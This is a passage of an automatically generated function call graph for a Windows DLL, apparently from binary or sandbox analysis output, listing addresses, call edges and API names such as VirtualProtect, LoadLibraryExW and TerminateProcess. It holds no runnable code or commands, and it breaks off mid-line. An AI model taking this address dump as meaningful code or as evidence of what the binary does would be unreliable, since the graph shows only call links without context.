7047->7050 7048->7043 7051 1000545a 7050->7051 7052 10005468 7050->7052 7051->7052 7057 1000547f 7051->7057 7053 10006368 _free 19 API calls 7052->7053 7054 10005470 7053->7054 7055 100062ac ___std_exception_copy 25 API calls 7054->7055 7056 1000547a 7055->7056 7056->7048 7057->7056 7058 10006368 _free 19 API calls 7057->7058 7058->7054 7854 10004bdd 7855 10004c08 7854->7855 7856 10004bec 7854->7856 7858 10006d60 49 API calls 7855->7858 7856->7855 7857 10004bf2 7856->7857 7859 10006368 _free 19 API calls 7857->7859 7860 10004c0f GetModuleFileNameA 7858->7860 7861 10004bf7 7859->7861 7862 10004c33 7860->7862 7863 100062ac ___std_exception_copy 25 API calls 7861->7863 7877 10004d01 7862->7877 7864 10004c01 7863->7864 7869 10004c72 7872 10004d01 36 API calls 7869->7872 7870 10004c66 7871 10006368 _free 19 API calls 7870->7871 7876 10004c6b 7871->7876 7874 10004c88 7872->7874 7873 1000571e _free 19 API calls 7873->7864 7875 1000571e _free 19 API calls 7874->7875 7874->7876 7875->7876 7876->7873 7879 10004d26 7877->7879 7881 10004d86 7879->7881 7889 100070eb 7879->7889 7880 10004c50 7883 10004e76 7880->7883 7881->7880 7882 100070eb 36 API calls 7881->7882 7882->7881 7884 10004e8b 7883->7884 7885 10004c5d 7883->7885 7884->7885 7886 1000637b _abort 19 API calls 7884->7886 7885->7869 7885->7870 7887 10004eb9 7886->7887 7888 1000571e _free 19 API calls 7887->7888 7888->7885 7892 10007092 7889->7892 7893 100054a7 __fassign 36 API calls 7892->7893 7894 100070a6 7893->7894 7894->7879 5886 10006d60 5887 10006d69 5886->5887 5888 10006d72 5886->5888 5890 10006c5f 5887->5890 5910 10005af6 GetLastError 5890->5910 5892 10006c6c 5930 10006d7e 5892->5930 5894 10006c74 5939 100069f3 5894->5939 5897 10006c8b 5897->5888 5900 10006cce 5966 1000571e 5900->5966 5904 10006cc9 5963 10006368 5904->5963 5906 10006d12 5906->5900 5972 100068c9 5906->5972 5907 10006ce6 5907->5906 5908 1000571e _free 19 API calls 5907->5908 5908->5906 5911 10005b12 5910->5911 5912 10005b0c 5910->5912 5917 10005b61 SetLastError 5911->5917 5982 1000637b 5911->5982 5975 10005e08 5912->5975 5916 10005b2c 5919 1000571e _free 19 API calls 5916->5919 5917->5892 5921 10005b32 5919->5921 5923 10005b6d SetLastError 5921->5923 5922 10005b48 5996 1000593c 5922->5996 6001 100055a8 5923->6001 5928 1000571e _free 19 API calls 5929 10005b5a 5928->5929 5929->5917 5929->5923 5931 10006d8a ___DestructExceptionObject 5930->5931 5932 10005af6 _abort 36 API calls 5931->5932 5934 10006d94 5932->5934 5935 10006e18 _abort 5934->5935 5936 100055a8 _abort 36 API calls 5934->5936 5938 1000571e _free 19 API calls 5934->5938 6376 10005671 RtlEnterCriticalSection 5934->6376 6377 10006e0f 5934->6377 5935->5894 5936->5934 5938->5934 6381 100054a7 5939->6381 5942 10006a14 GetOEMCP 5944 10006a3d 5942->5944 5943 10006a26 5943->5944 5945 10006a2b GetACP 5943->5945 5944->5897 5946 100056d0 5944->5946 5945->5944 5947 1000570e 5946->5947 5951 100056de _abort 5946->5951 5949 10006368 _free 19 API calls 5947->5949 5948 100056f9 RtlAllocateHeap 5950 1000570c 5948->5950 5948->5951 5949->5950 5950->5900 5953 10006e20 5950->5953 5951->5947 5951->5948 5952 1000474f _abort 7 API calls 5951->5952 5952->5951 5954 100069f3 38 API calls 5953->5954 5955 10006e3f 5954->5955 5958 10006e90 IsValidCodePage 5955->5958 5960 10006e46 5955->5960 5962 10006eb5 ___scrt_fastfail 5955->5962 5956 10002ada _ValidateLocalCookies 5 API calls 5957 10006cc1 5956->5957 5957->5904 5957->5907 5959 10006ea2 GetCPInfo 5958->5959 5958->5960 5959->5960 5959->5962 5960->5956 6418 10006acb GetCPInfo 5962->6418 5964 10005b7a _free 19 API calls 5963->5964 5965 1000636d 5964->5965 5965->5900 5967 10005752 _free 5966->5967 5968 10005729 HeapFree 5966->5968 5967->5897 5968->5967 5969 1000573e 5968->5969 5970 10006368 _free 17 API calls 5969->5970 5971 10005744 GetLastError 5970->5971 5971->5967 6491 10006886 5972->6491 5974 100068ed 5974->5900 6012 10005c45 5975->6012 5977 10005e2f 5978 10005e47 TlsGetValue 5977->5978 5981 10005e3b 5977->5981 5978->5981 5980 10005e58 5980->5911 6016 10002ada 5981->6016 5987 10006388 _abort 5982->5987 5983 100063c8 5986 10006368 _free 18 API calls 5983->5986 5984 100063b3 RtlAllocateHeap 5985 10005b24 5984->5985 5984->5987 5985->5916 5989 10005e5e 5985->5989 5986->5985 5987->5983 5987->5984 6031 1000474f 5987->6031 5990 10005c45 _abort 4 API calls 5989->5990 5991 10005e85 5990->5991 5992 10005ea0 TlsSetValue 5991->5992 5993 10005e94 5991->5993 5992->5993 5994 10002ada _ValidateLocalCookies 5 API calls 5993->5994 5995 10005b41 5994->5995 5995->5916 5995->5922 6047 10005914 5996->6047 6195 10007613 6001->6195 6004 100055b8 6006 100055c2 IsProcessorFeaturePresent 6004->6006 6007 100055e0 6004->6007 6009 100055cd 6006->6009 6231 10004bc1 6007->6231 6225 100060e2 6009->6225 6014 10005c71 6012->6014 6015 10005c75 __crt_fast_encode_pointer 6012->6015 6014->6015 6023 10005ce1 6014->6023 6015->5977 6017 10002ae3 6016->6017 6018 10002ae5 IsProcessorFeaturePresent 6016->6018 6017->5980 6020 10002b58 6018->6020 6030 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6020->6030 6022 10002c3b 6022->5980 6024 10005d02 LoadLibraryExW 6023->6024 6029 10005cf7 6023->6029 6025 10005d1f GetLastError 6024->6025 6028 10005d37 6024->6028 6026 10005d2a LoadLibraryExW 6025->6026 6025->6028 6026->6028 6027 10005d4e FreeLibrary 6027->6029 6028->6027 6028->6029 6029->6014 6030->6022 6036 10004793 6031->6036 6033 10002ada _ValidateLocalCookies 5 API calls 6034 1000478f 6033->6034 6034->5987 6035 10004765 6035->6033 6037 1000479f ___DestructExceptionObject 6036->6037 6042 10005671 RtlEnterCriticalSection 6037->6042 6039 100047aa 6043 100047dc 6039->6043 6041 100047d1 _abort 6041->6035 6042->6039 6046 100056b9 RtlLeaveCriticalSection 6043->6046 6045 100047e3 6045->6041 6046->6045 6053 10005854 6047->6053 6049 10005938 6050 100058c4 6049->6050 6064 10005758 6050->6064 6052 100058e8 6052->5928 6054 10005860 ___DestructExceptionObject 6053->6054 6059 10005671 RtlEnterCriticalSection 6054->6059 6056 1000586a 6060 10005890 6056->6060 6058 10005888 _abort 6058->6049 6059->6056 6063 100056b9 RtlLeaveCriticalSection 6060->6063 6062 1000589a 6062->6058 6063->6062 6065 10005764 ___DestructExceptionObject 6064->6065 6072 10005671 RtlEnterCriticalSection 6065->6072 6067 1000576e 6073 10005a7f 6067->6073 6069 10005786 6077 1000579c 6069->6077 6071 10005794 _abort 6071->6052 6072->6067 6074 10005ab5 __fassign 6073->6074 6075 10005a8e __fassign 6073->6075 6074->6069 6075->6074 6080 10007cc2 6075->6080 6194 100056b9 RtlLeaveCriticalSection 6077->6194 6079 100057a6 6079->6071 6081 10007d42 6080->6081 6085 10007cd8 6080->6085 6082 10007d90 6081->6082 6084 1000571e _free 19 API calls 6081->6084 6148 10007e35 6082->6148 6086 10007d64 6084->6086 6085->6081 6087 10007d0b 6085->6087 6092 1000571e _free 19 API calls 6085->6092 6088 1000571e _free 19 API calls 6086->6088 6089 10007d2d 6087->6089 6094 1000571e _free 19 API calls 6087->6094 6090 10007d77 6088->6090 6091 1000571e _free 19 API calls 6089->6091 6093 1000571e _free 19 API calls 6090->6093 6095 10007d37 6091->6095 6097 10007d00 6092->6097 6100 10007d85 6093->6100 6101 10007d22 6094->6101 6102 1000571e _free 19 API calls 6095->6102 6096 10007dfe 6103 1000571e _free 19 API calls 6096->6103 6108 100090ba 6097->6108 6098 10007d9e 6098->6096 6106 1000571e 19 API calls _free 6098->6106 6104 1000571e _free 19 API calls 6100->6104 6136 100091b8 6101->6136 6102->6081 6107 10007e04 6103->6107 6104->6082 6106->6098 6107->6074 6109 100090cb 6108->6109 6135 100091b4 6108->6135 6110 100090dc 6109->6110 6112 1000571e _free 19 API calls 6109->6112 6111 100090ee 6110->6111 6113 1000571e _free 19 API calls 6110->6113 6114 10009100 6111->6114 6115 1000571e _free 19 API calls 6111->6115 6112->6110 6113->6111 6116 10009112 6114->6116 6117 1000571e _free 19 API calls 6114->6117 6115->6114 6118 10009124 6116->6118 6120 1000571e _free 19 API calls 6116->6120 6117->6116 6119 10009136 6118->6119 6121 1000571e _free 19 API calls 6118->6121 6122 10009148 6119->6122 6123 1000571e _free 19 API calls 6119->6123 6120->6118 6121->6119 6124 1000571e _free 19 API calls 6122->6124 6127 1000915a 6122->6127 6123->6122 6124->6127 6125 1000916c 6126 1000917e 6125->6126 6129 1000571e _free 19 API calls 6125->6129 6130 10009190 6126->6130 6131 1000571e _free 19 API calls 6126->6131 6127->6125 6128 1000571e _free 19 API calls 6127->6128 6128->6125 6129->6126 6132 100091a2 6130->6132 6133 1000571e _free 19 API calls 6130->6133 6131->6130 6134 1000571e _free 19 API calls 6132->6134 6132->6135 6133->6132 6134->6135 6135->6087 6137 100091c5 6136->6137 6138 1000921d 6136->6138 6139 100091d5 6137->6139 6140 1000571e _free 19 API calls 6137->6140 6138->6089 6141 100091e7 6139->6141 6142 1000571e _free 19 API calls 6139->6142 6140->6139 6143 100091f9 6141->6143 6144 1000571e _free 19 API calls 6141->6144 6142->6141 6145 1000920b 6143->6145 6146 1000571e _free 19 API calls 6143->6146 6144->6143 6145->6138 6147 1000571e _free 19 API calls 6145->6147 6146->6145 6147->6138 6149 10007e42 6148->6149 6153 10007e60 6148->6153 6149->6153 6154 1000925d 6149->6154 6152 1000571e _free 19 API calls 6152->6153 6153->6098 6155 10007e5a 6154->6155 6156 1000926e 6154->6156 6155->6152 6190 10009221 6156->6190 6159 10009221 __fassign 19 API calls 6160 10009281 6159->6160 6161 10009221 __fassign 19 API calls 6160->6161 6162 1000928c 6161->6162 6163 10009221 __fassign 19 API calls 6162->6163 6164 10009297 6163->6164 6165 10009221 __fassign 19 API calls 6164->6165 6166 100092a5 6165->6166 6167 1000571e _free 19 API calls 6166->6167 6168 100092b0 6167->6168 6169 1000571e _free 19 API calls 6168->6169 6170 100092bb 6169->6170 6171 1000571e _free 19 API calls 6170->6171 6172 100092c6 6171->6172 6173 10009221 __fassign 19 API calls 6172->6173 6174 100092d4 6173->6174 6175 10009221 __fassign 19 API calls 6174->6175 6176 100092e2 6175->6176 6177 10009221 __fassign 19 API calls 6176->6177 6178 100092f3 6177->6178 6179 10009221 __fassign 19 API calls 6178->6179 6180 10009301 6179->6180 6181 10009221 __fassign 19 API calls 6180->6181 6182 1000930f 6181->6182 6183 1000571e _free 19 API calls 6182->6183 6184 1000931a 6183->6184 6185 1000571e _free 19 API calls 6184->6185 6186 10009325 6185->6186 6187 1000571e _free 19 API calls 6186->6187 6188 10009330 6187->6188 6189 1000571e _free 19 API calls 6188->6189 6189->6155 6191 10009258 6190->6191 6192 10009248 6190->6192 6191->6159 6192->6191 6193 1000571e _free 19 API calls 6192->6193 6193->6192 6194->6079 6234 10007581 6195->6234 6198 1000766e 6199 1000767a _abort 6198->6199 6201 100076a7 _abort 6199->6201 6205 100076a1 _abort 6199->6205 6248 10005b7a GetLastError 6199->6248 6211 1000771f 6201->6211 6270 10005671 RtlEnterCriticalSection 6201->6270 6202 100076f3 6203 10006368 _free 19 API calls 6202->6203 6206 100076f8 6203->6206 6204 100076d6 6279 1000bdc9 6204->6279 6205->6201 6205->6202 6205->6204 6267 100062ac 6206->6267 6212 1000777e 6211->6212 6214 10007776 6211->6214 6222 100077a9 6211->6222 6271 100056b9 RtlLeaveCriticalSection 6211->6271 6212->6222 6272 10007665 6212->6272 6217 10004bc1 _abort 26 API calls 6214->6217 6217->6212 6219 10005af6 _abort 36 API calls 6223 1000780c 6219->6223 6221 10007665 _abort 36 API calls 6221->6222 6275 1000782e 6222->6275 6223->6204 6224 10005af6 _abort 36 API calls 6223->6224 6224->6204 6226 100060fe ___scrt_fastfail 6225->6226 6227 1000612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6226->6227 6229 100061fb ___scrt_fastfail 6227->6229 6228 10002ada _ValidateLocalCookies 5 API calls 6230 10006219 6228->6230 6229->6228 6230->6007 6298 1000499b 6231->6298 6237 10007527 6234->6237 6236 100055ad 6236->6004 6236->6198 6238 10007533 ___DestructExceptionObject 6237->6238 6243 10005671 RtlEnterCriticalSection 6238->6243 6240 10007541 6244 10007575 6240->6244 6242 10007568 _abort 6242->6236 6243->6240 6247 100056b9 RtlLeaveCriticalSection 6244->6247 6246 1000757f 6246->6242 6247->6246 6249 10005b93 6248->6249 6252 10005b99 6248->6252 6250 10005e08 _abort 10 API calls 6249->6250 6250->6252 6251 1000637b _abort 16 API calls 6253 10005bab 6251->6253 6252->6251 6254 10005bf0 SetLastError 6252->6254 6255 10005bb3 6253->6255 6256 10005e5e _abort 10 API calls 6253->6256 6257 10005bf9 6254->6257 6259 1000571e _free 16 API calls 6255->6259 6258 10005bc8 6256->6258 6257->6205 6258->6255 6260 10005bcf 6258->6260 6261 10005bb9 6259->6261 6262 1000593c _abort 16 API calls 6260->6262 6263 10005be7 SetLastError 6261->6263 6264 10005bda 6262->6264 6263->6257 6265 1000571e _free 16 API calls 6264->6265 6266 10005be0 6265->6266 6266->6254 6266->6263 6282 10006231 6267->6282 6269 100062b8 6269->6204 6270->6211 6271->6214 6273 10005af6 _abort 36 API calls 6272->6273 6274 1000766a 6273->6274 6274->6221 6276 10007834 6275->6276 6277 100077fd 6275->6277 6297 100056b9 RtlLeaveCriticalSection 6276->6297 6277->6204 6277->6219 6277->6223 6280 10002ada _ValidateLocalCookies 5 API calls 6279->6280 6281 1000bdd4 6280->6281 6281->6281 6283 10005b7a _free 19 API calls 6282->6283 6284 10006247 6283->6284 6285 100062a6 6284->6285 6288 10006255 6284->6288 6293 100062bc IsProcessorFeaturePresent 6285->6293 6287 100062ab 6289 10006231 ___std_exception_copy 25 API calls 6287->6289 6290 10002ada _ValidateLocalCookies 5 API calls 6288->6290 6291 100062b8 6289->6291 6292 1000627c 6290->6292 6291->6269 6292->6269 6294 100062c7 6293->6294 6295 100060e2 _abort 8 API calls 6294->6295 6296 100062dc GetCurrentProcess TerminateProcess 6295->6296 6296->6287 6297->6277 6299 100049a7 _abort 6298->6299 6300 100049bf 6299->6300 6320 10004af5 GetModuleHandleW 6299->6320 6328 10005671 RtlEnterCriticalSection 6300->6328 6304 10004a65 6336 10004aa5 6304->6336 6308 10004a3c 6309 10004a54 6308->6309 6332 10004669 6308->6332 6316 10004669 _abort 5 API calls 6309->6316 6310 100049c7 6310->6304 6310->6308 6329 1000527a 6310->6329 6311 10004a82 6339 10004ab4 6311->6339 6312 10004aae 6314 1000bdc9 _abort 5 API calls 6312->6314 6318 10004ab3 6314->6318 6316->6304 6321 100049b3 6320->6321 6321->6300 6322 10004b39 GetModuleHandleExW 6321->6322 6327 10004b63 6322->6327 6323 10004b95 6325 10002ada _ValidateLocalCookies 5 API calls 6323->6325 6324 10004b8c FreeLibrary 6324->6323 6326 10004b9f 6325->6326 6326->6300 6327->6323 6327->6324 6328->6310 6347 10005132 6329->6347 6333 10004698 6332->6333 6334 10002ada _ValidateLocalCookies 5 API calls 6333->6334 6335 100046c1 6334->6335 6335->6309 6369 100056b9 RtlLeaveCriticalSection 6336->6369 6338 10004a7e 6338->6311 6338->6312 6370 10006025 6339->6370 6342 10004ae2 6344 10004b39 _abort 7 API calls 6342->6344 6343 10004ac2 GetPEB 6343->6342 6345 10004ad2 GetCurrentProcess TerminateProcess 6343->6345 6346 10004aea ExitProcess 6344->6346 6345->6342 6350 100050e1 6347->6350 6349 10005156 6349->6308 6351 100050ed ___DestructExceptionObject 6350->6351 6358 10005671 RtlEnterCriticalSection 6351->6358 6353 100050fb 6359 1000515a 6353->6359 6357 10005119 _abort 6357->6349 6358->6353 6362 10005182 6359->6362 6363 1000517a 6359->6363 6360 10002ada _ValidateLocalCookies 5 API calls 6361 10005108 6360->6361 6365 10005126 6361->6365 6362->6363 6364 1000571e _free 19 API calls 6362->6364 6363->6360 6364->6363 6368 100056b9 RtlLeaveCriticalSection 6365->6368 6367 10005130 6367->6357 6368->6367 6369->6338 6371 1000604a 6370->6371 6375 10006040 6370->6375 6372 10005c45 _abort 4 API calls 6371->6372 6372->6375 6373 10002ada _ValidateLocalCookies 5 API calls 6374 10004abe 6373->6374 6374->6342 6374->6343 6375->6373 6376->5934 6380 100056b9 RtlLeaveCriticalSection 6377->6380 6379 10006e16 6379->5934 6380->6379 6382 100054c4 6381->6382 6388 100054ba 6381->6388 6383 10005af6 _abort 36 API calls 6382->6383 6382->6388 6384 100054e5 6383->6384 6389 10007a00 6384->6389 6388->5942 6388->5943 6390 10007a13 6389->6390 6392 100054fe 6389->6392 6390->6392 6397 10007f0f 6390->6397 6393 10007a2d 6392->6393 6394 10007a40 6393->6394 6396 10007a55 6393->6396 6395 10006d7e __fassign 36 API calls 6394->6395 6394->6396 6395->6396 6396->6388 6398 10007f1b ___DestructExceptionObject 6397->6398 6399 10005af6 _abort 36 API calls 6398->6399 6400 10007f24 6399->6400 6401 10007f72 _abort 6400->6401 6409 10005671 RtlEnterCriticalSection 6400->6409 6401->6392 6403 10007f42 6410 10007f86 6403->6410 6408 100055a8 _abort 36 API calls 6408->6401 6409->6403 6411 10007f94 __fassign 6410->6411 6413 10007f56 6410->6413 6412 10007cc2 __fassign 19 API calls 6411->6412 6411->6413 6412->6413 6414 10007f75 6413->6414 6417 100056b9 RtlLeaveCriticalSection 6414->6417 6416 10007f69 6416->6401 6416->6408 6417->6416 6419 10006baf 6418->6419 6423 10006b05 6418->6423 6422 10002ada _ValidateLocalCookies 5 API calls 6419->6422 6425 10006c5b 6422->6425 6428 100086e4 6423->6428 6425->5960 6427 10008a3e 41 API calls 6427->6419 6429 100054a7 __fassign 36 API calls 6428->6429 6430 10008704 MultiByteToWideChar 6429->6430 6432 100087da 6430->6432 6433 10008742 6430->6433 6434 10002ada _ValidateLocalCookies 5 API calls 6432->6434 6436 100056d0 20 API calls 6433->6436 6439 10008763 ___scrt_fastfail 6433->6439 6437 10006b66 6434->6437 6435 100087d4 6447 10008801 6435->6447 6436->6439 6442 10008a3e 6437->6442 6439->6435 6440 100087a8 MultiByteToWideChar 6439->6440 6440->6435 6441 100087c4 GetStringTypeW 6440->6441 6441->6435 6443 100054a7 __fassign 36 API calls 6442->6443 6444 10008a51 6443->6444 6451 10008821 6444->6451 6448 1000880d 6447->6448 6449 1000881e 6447->6449 6448->6449 6450 1000571e _free 19 API calls 6448->6450 6449->6432 6450->6449 6452 1000883c 6451->6452 6453 10008862 MultiByteToWideChar 6452->6453 6454 10008a16 6453->6454 6455 1000888c 6453->6455 6456 10002ada _ValidateLocalCookies 5 API calls 6454->6456 6460 100056d0 20 API calls 6455->6460 6462 100088ad 6455->6462 6457 10006b87 6456->6457 6457->6427 6458 100088f6 MultiByteToWideChar 6459 10008962 6458->6459 6461 1000890f 6458->6461 6464 10008801 __freea 19 API calls 6459->6464 6460->6462 6478 10005f19 6461->6478 6462->6458 6462->6459 6464->6454 6466 10008971 6468 100056d0 20 API calls 6466->6468 6472 10008992 6466->6472 6467 10008939 6467->6459 6469 10005f19 10 API calls 6467->6469 6468->6472 6469->6459 6470 10008a07 6471 10008801 __freea 19 API calls 6470->6471 6471->6459 6472->6470 6473 10005f19 10 API calls 6472->6473 6474 100089e6 6473->6474 6474->6470 6475 100089f5 WideCharToMultiByte 6474->6475 6475->6470 6476 10008a35 6475->6476 6477 10008801 __freea 19 API calls 6476->6477 6477->6459 6479 10005c45 _abort 4 API calls 6478->6479 6480 10005f40 6479->6480 6483 10005f49 6480->6483 6486 10005fa1 6480->6486 6484 10002ada _ValidateLocalCookies 5 API calls 6483->6484 6485 10005f9b 6484->6485 6485->6459 6485->6466 6485->6467 6487 10005c45 _abort 4 API calls 6486->6487 6488 10005fc8 6487->6488 6489 10002ada _ValidateLocalCookies 5 API calls 6488->6489 6490 10005f89 LCMapStringW 6489->6490 6490->6483 6492 10006892 ___DestructExceptionObject 6491->6492 6499 10005671 RtlEnterCriticalSection 6492->6499 6494 1000689c 6500 100068f1 6494->6500 6498 100068b5 _abort 6498->5974 6499->6494 6512 10007011 6500->6512 6502 1000693f 6503 10007011 25 API calls 6502->6503 6504 1000695b 6503->6504 6505 10007011 25 API calls 6504->6505 6506 10006979 6505->6506 6507 100068a9 6506->6507 6508 1000571e _free 19 API calls 6506->6508 6509 100068bd 6507->6509 6508->6507 6526 100056b9 RtlLeaveCriticalSection 6509->6526 6511 100068c7 6511->6498 6513 10007022 6512->6513 6521 1000701e 6512->6521 6514 10007029 6513->6514 6518 1000703c ___scrt_fastfail 6513->6518 6515 10006368 _free 19 API calls 6514->6515 6516 1000702e 6515->6516 6517 100062ac ___std_exception_copy 25 API calls 6516->6517 6517->6521 6519 10007073 6518->6519 6520 1000706a 6518->6520 6518->6521 6519->6521 6523 10006368 _free 19 API calls 6519->6523 6522 10006368 _free 19 API calls 6520->6522 6521->6502 6524 1000706f 6522->6524 6523->6524 6525 100062ac ___std_exception_copy 25 API calls 6524->6525 6525->6521 6526->6511 7556 10007260 GetStartupInfoW 7557 10007286 7556->7557 7558 10007318 7556->7558 7557->7558 7562 10008be3 7557->7562 7560 100072af 7560->7558 7561 100072dd GetFileType 7560->7561 7561->7560 7563 10008bef ___DestructExceptionObject 7562->7563 7564 10008c13 7563->7564 7565 10008bfc 7563->7565 7575 10005671 RtlEnterCriticalSection 7564->7575 7567 10006368 _free 19 API calls 7565->7567 7568 10008c01 7567->7568 7569 100062ac ___std_exception_copy 25 API calls 7568->7569 7570 10008c0b _abort 7569->7570 7570->7560 7571 10008c4b 7583 10008c72 7571->7583 7572 10008c1f 7572->7571 7576 10008b34 7572->7576 7575->7572 7577 1000637b _abort 19 API calls 7576->7577 7578 10008b46 7577->7578 7580 10005eb7 10 API calls 7578->7580 7582 10008b53 7578->7582 7579 1000571e _free 19 API calls 7581 10008ba5 7579->7581 7580->7578 7581->7572 7582->7579 7586 100056b9 RtlLeaveCriticalSection 7583->7586 7585 10008c79 7585->7570 7586->7585 7694 100081a0 7695 100081d9 7694->7695 7696 100081dd 7695->7696 7707 10008205 7695->7707 7697 10006368 _free 19 API calls 7696->7697 7698 100081e2 7697->7698 7700 100062ac ___std_exception_copy 25 API calls 7698->7700 7699 10008529 7701 10002ada _ValidateLocalCookies 5 API calls 7699->7701 7702 100081ed 7700->7702 7703 10008536 7701->7703 7704 10002ada _ValidateLocalCookies 5 API calls 7702->7704 7706 100081f9 7704->7706 7707->7699 7708 100080c0 7707->7708 7711 100080db 7708->7711 7709 10002ada _ValidateLocalCookies 5 API calls 7710 10008152 7709->7710 7710->7707 7711->7709 7895 1000a1e0 7898 1000a1fe 7895->7898 7897 1000a1f6 7899 1000a203 7898->7899 7900 1000aa53 20 API calls 7899->7900 7902 1000a298 7899->7902 7901 1000a42f 7900->7901 7901->7897 7902->7897 7587 10009d61 7588 10009d81 7587->7588 7591 10009db8 7588->7591 7590 10009dab 7592 10009dbf 7591->7592 7593 10009e20 7592->7593 7594 10009ddf 7592->7594 7595 1000aa17 20 API calls 7593->7595 7596 1000a90e 7593->7596 7594->7596 7598 1000aa17 20 API calls 7594->7598 7597 10009e6e 7595->7597 7596->7590 7597->7590 7599 1000a93e 7598->7599 7599->7590 7712 100021a1 ___scrt_dllmain_exception_filter 6527 1000c7a7 6528 1000c7be 6527->6528 6533 1000c82c 6527->6533 6528->6533 6537 1000c7e6 GetModuleHandleA 6528->6537 6529 1000c872 6530 1000c835 GetModuleHandleA 6532 1000c83f 6530->6532 6532->6532 6532->6533 6533->6529 6533->6530 6534 1000c7dd 6534->6533 6535 1000c80d VirtualProtect 6534->6535 6535->6533 6536 1000c81c VirtualProtect 6535->6536 6536->6533 6538 1000c7ef 6537->6538 6544 1000c82c 6537->6544 6547 1000c803 6538->6547 6540 1000c872 6541 1000c835 GetModuleHandleA 6543 1000c83f 6541->6543 6542 1000c7f4 6542->6544 6545 1000c80d VirtualProtect 6542->6545 6543->6543 6543->6544 6544->6540 6544->6541 6545->6544 6546 1000c81c VirtualProtect 6545->6546 6546->6544 6548 1000c809 6547->6548 6549 1000c82c 6548->6549 6550 1000c80d VirtualProtect 6548->6550 6552 1000c872 6549->6552 6553 1000c835 GetModuleHandleA 6549->6553 6550->6549 6551 1000c81c VirtualProtect 6550->6551 6551->6549 6554 1000c83f 6553->6554 6554->6549 7059 1000742b 7060 10007430 7059->7060 7062 10007453 7060->7062 7063 10008bae 7060->7063 7064 10008bbb 7063->7064 7068 10008bdd 7063->7068 7065 10008bd7 7064->7065 7066 10008bc9 RtlDeleteCriticalSection 7064->7066 7067 1000571e _free 19 API calls 7065->7067 7066->7065 7066->7066 7067->7068 7068->7060 7600 1000ac6b 7601 1000ac84 __startOneArgErrorHandling 7600->7601 7603 1000acad __startOneArgErrorHandling 7601->7603 7604 1000b2f0 7601->7604 7605 1000b329 __startOneArgErrorHandling 7604->7605 7606 1000b5c1 __raise_exc RaiseException 7605->7606 7607 1000b350 __startOneArgErrorHandling 7605->7607 7606->7607 7608 1000b393 7607->7608 7610 1000b36e 7607->7610 7609 1000b8b2 __startOneArgErrorHandling 19 API calls 7608->7609 7612 1000b38e __startOneArgErrorHandling 7609->7612 7615 1000b8e1 7610->7615 7613 10002ada _ValidateLocalCookies 5 API calls 7612->7613 7614 1000b3b7 7613->7614 7614->7603 7616 1000b8f0 7615->7616 7617 1000b964 __startOneArgErrorHandling 7616->7617 7618 1000b90f __startOneArgErrorHandling 7616->7618 7620 1000b8b2 __startOneArgErrorHandling 19 API calls 7617->7620 7619 100078a3 __startOneArgErrorHandling 5 API calls 7618->7619 7621 1000b950 7619->7621 7623 1000b95d 7620->7623 7622 1000b8b2 __startOneArgErrorHandling 19 API calls 7621->7622 7621->7623 7622->7623 7623->7612 7713 100060ac 7714 100060dd 7713->7714 7716 100060b7 7713->7716 7715 100060c7 FreeLibrary 7715->7716 7716->7714 7716->7715 7624 1000506f 7625 10005081 7624->7625 7626 10005087 7624->7626 7627 10005000 19 API calls 7625->7627 7627->7626 7069 10005630 7070 1000563b 7069->7070 7072 10005664 7070->7072 7073 10005660 7070->7073 7075 10005eb7 7070->7075 7082 10005688 7072->7082 7076 10005c45 _abort 4 API calls 7075->7076 7077 10005ede 7076->7077 7078 10005efc InitializeCriticalSectionAndSpinCount 7077->7078 7079 10005ee7 7077->7079 7078->7079 7080 10002ada _ValidateLocalCookies 5 API calls 7079->7080 7081 10005f13 7080->7081 7081->7070 7083 100056b4 7082->7083 7084 10005695 7082->7084 7083->7073 7085 1000569f RtlDeleteCriticalSection 7084->7085 7085->7083 7085->7085 7628 10003370 7639 10003330 7628->7639 7640 10003342 7639->7640 7641 1000334f 7639->7641 7642 10002ada _ValidateLocalCookies 5 API calls 7640->7642 7642->7641 7903 100063f0 7904 10006400 7903->7904 7910 10006416 7903->7910 7905 10006368 _free 19 API calls 7904->7905 7906 10006405 7905->7906 7908 100062ac ___std_exception_copy 25 API calls 7906->7908 7907 10004e76 19 API calls 7911 100064e5 7907->7911 7917 1000640f 7908->7917 7909 10006480 7909->7907 7910->7909 7915 10006561 7910->7915 7922 10006580 7910->7922 7913 100064ee 7911->7913 7919 10006573 7911->7919 7933 100085eb 7911->7933 7914 1000571e _free 19 API calls 7913->7914 7914->7915 7942 1000679a 7915->7942 7920 100062bc ___std_exception_copy 11 API calls 7919->7920 7921 1000657f 7920->7921 7923 1000658c 7922->7923 7923->7923 7924 1000637b _abort 19 API calls 7923->7924 7925 100065ba 7924->7925 7926 100085eb 25 API calls 7925->7926 7927 100065e6 7926->7927 7928 100062bc ___std_exception_copy 11 API calls 7927->7928 7929 10006615 ___scrt_fastfail 7928->7929 7930 100066b6 FindFirstFileExA 7929->7930 7931 10006705 7930->7931 7932 10006580 25 API calls 7931->7932 7934 1000853a 7933->7934 7936 10008554 7934->7936 7937 1000854f 7934->7937 7939 1000858b 7934->7939 7935 10006368 _free 19 API calls 7941 1000857a 7935->7941 7936->7911 7937->7935 7937->7936 7938 100062ac ___std_exception_copy 25 API calls 7938->7936 7939->7936 7940 10006368 _free 19 API calls 7939->7940 7940->7941 7941->7938 7943 100067a4 7942->7943 7944 100067b4 7943->7944 7946 1000571e _free 19 API calls 7943->7946 7945 1000571e _free 19 API calls 7944->7945 7947 100067bb 7945->7947 7946->7943 7947->7917 7643 10009e71 7644 10009e95 7643->7644 7645 10009ee6 7644->7645 7647 10009f71 __startOneArgErrorHandling 7644->7647 7648 10009ef8 7645->7648 7651 1000aa53 7645->7651 7649 1000b2f0 20 API calls 7647->7649 7650 1000acad __startOneArgErrorHandling 7647->7650 7649->7650 7652 1000aa70 RtlDecodePointer 7651->7652 7654 1000aa80 7651->7654 7652->7654 7653 10002ada _ValidateLocalCookies 5 API calls 7656 1000ac67 7653->7656 7655 1000ab0d 7654->7655 7657 1000ab02 7654->7657 7659 1000aab7 7654->7659 7655->7657 7658 10006368 _free 19 API calls 7655->7658 7656->7648 7657->7653 7658->7657 7659->7657 7660 10006368 _free 19 API calls 7659->7660 7660->7657 7721 10003eb3 7722 10005411 36 API calls 7721->7722 7723 10003ebb 7722->7723 7086 1000543d 7087 10005440 7086->7087 7088 100055a8 _abort 36 API calls 7087->7088 7089 1000544c 7088->7089 6857 10001f3f 6858 10001f4b ___DestructExceptionObject 6857->6858 6875 1000247c 6858->6875 6860 